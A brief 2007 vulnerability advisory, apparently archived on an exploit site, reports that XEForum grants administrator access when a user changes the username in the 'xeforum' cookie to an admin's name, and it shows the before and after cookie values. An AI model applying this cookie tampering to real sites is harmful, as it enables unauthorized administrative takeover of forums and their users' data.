Home / os / solaris

xeforum-privesc.txt

Posted on 30 June 2007

-------------------------------------------------------------------- XEForum Cookie Modification Privilege Escalation Vulnerability -------------------------------------------------------------------- Vulnerable product: XEForum Vendor: http://www.xeforum.com/ Date: -------------------- Found: Jun 26, 2007 Vulnerability: -------------------- XeForum contains a flaw that may allow a remote attacker to gain administrative privileges. Modifying contained cookie you can change of session and to even enter like administrator. Cookie: ----------------------------------- : Cookie: xeforum="Your Username" : ----------------------------------- change to: ------------------------------------ : Cookie: xeforum="Admin Username" : ------------------------------------ Credit: -------------------- Firewall Firewall of Peru Firewall@hotmail.com Greetz to Swp-Scene And Revolutionz http://4firewall.uni.cc --------------------------------------------------------------------

 

TOP